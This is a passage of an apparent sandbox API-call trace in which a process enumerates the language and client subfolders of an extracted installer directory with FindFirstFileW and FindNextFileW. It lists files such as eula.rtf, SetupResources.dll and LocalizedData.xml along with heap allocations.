ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260108 [0045.870] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.870] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.870] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.870] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.870] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.874] FindClose (in: hFindFile=0x4260108 | out: hFindFile=0x4260108) returned 1 [0045.874] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.874] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0045.874] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.874] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260348 [0045.874] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.874] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.875] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.875] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.875] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.875] FindClose (in: hFindFile=0x4260348 | out: hFindFile=0x4260348) returned 1 [0045.875] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.875] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0045.875] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.875] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260508 [0045.875] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.875] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.875] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.876] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.876] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.876] FindClose (in: hFindFile=0x4260508 | out: hFindFile=0x4260508) returned 1 [0045.876] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.876] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0045.876] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.876] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260408 [0045.876] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.876] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.876] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.876] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.877] FindNextFileW (in: hFindFile=0x4260408, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.877] FindClose (in: hFindFile=0x4260408 | out: hFindFile=0x4260408) returned 1 [0045.877] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.877] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0045.877] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.877] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42606c8 [0045.877] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.877] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.877] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.877] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.878] FindNextFileW (in: hFindFile=0x42606c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.878] FindClose (in: hFindFile=0x42606c8 | out: hFindFile=0x42606c8) returned 1 [0045.878] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.878] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0045.878] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.878] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260688 [0045.879] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.879] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0045.879] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0045.879] FindNextFileW (in: hFindFile=0x4260688, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0045.879] FindClose (in: hFindFile=0x4260688 | out: hFindFile=0x4260688) returned 1 [0045.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.879] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0045.879] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0045.879] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Extended", cAlternateFileName="")) returned 1 [0045.879] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.879] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260608 [0045.880] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, 